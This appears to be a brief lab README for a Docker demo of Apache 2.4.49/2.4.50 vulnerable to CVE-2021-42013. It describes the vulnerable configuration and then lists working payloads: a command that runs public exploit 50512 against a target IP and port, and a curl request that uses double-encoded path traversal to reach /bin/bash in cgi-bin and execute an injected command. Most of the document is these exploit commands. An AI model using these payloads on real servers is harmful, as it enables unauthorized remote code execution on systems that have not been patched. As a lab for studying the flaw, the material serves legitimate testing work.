Apache 2.4.49/2.4.50 CVE-2021-42013
A docker demo using Apache 2.4.50
or use Apache 2.4.49/2.4.50 with cgi-bin enabled
and an alias (ie: for "icons" directory) with a Require directive
Payloads
searchsploit 50512 so python3 $(locate 50512.py) 192.168.56.1 6087
or with curl --data "echo; {{payload}}" --path-as-is http://172.17.0.2/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash